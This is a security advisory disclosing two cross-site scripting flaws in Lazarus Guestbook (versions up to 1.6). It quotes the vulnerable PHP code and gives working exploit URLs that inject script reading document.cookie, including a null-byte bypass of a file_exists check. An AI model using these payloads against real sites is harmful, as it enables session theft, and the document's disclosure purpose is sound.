Produce : Lazarus Guestbook
Website : http://carbonize.co.uk/Lazarus/
Version : <= 1.6
Problem : Cross Site Scripting

1) 
The first probleme is in codes-english.php ,"show" parameter in lang/codes-english.php isn't properly sanitised
This can be exploited to execute arbitrary HTML and javascript code

 Vulnerable code in  lang/codes-english.php near line 4

1  <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
2  <html>
3  <head>
4  <title><?php echo($_GET['show']); ?></title> 

Exploit : 

http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3E[XSS]
http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3E<script>alert(document.cookie);</script>


2)
the seconde probleme is in picture.php , the script verifiy fist if image file exists
after it display it ,

vulnerable code : in picture.php
********************************

24  if (!empty($_GET['img'])) {
26      if (file_exists("$GB_TMP/$_GET[img]")) {
27          $size = @GetImageSize("$GB_TMP/$_GET[img]");
28          $picture = "$GB_PG[base_url]/$GB_TMP/$_GET[img]";
29      }
..      ............
49      <td align="center" valign="middle">
50      <?php
51        if (!empty($_GET['img']) && is_array($size)) {
52            echo "<a href=\"javascript:window.close()\"><img src=\"$picture\" width=\"$size[0]\" height=\"$size[1]\" border=\"0\"></a>\n";
53        }
54    ?>
55    </td>    
    
****************
    if magic_quote_gpc = OFF we can bypass this protection by specifing existing image file ( Exemple : "img/home.gif") and using a nullchar ( %00 )
    
    POC : http://localhost/lazarusgb/picture.php?img=../img/home.gif%00[code]
    
    file_exists("$GB_TMP/$_GET[img]") will return true and html code will be executed
    
    Exploit: 
    
    http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E[XSS]
    http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E<script>alert(document.cookie);</script>
    
Contact : simo64[at]gmail[dot]com
Moroccan Security Research Team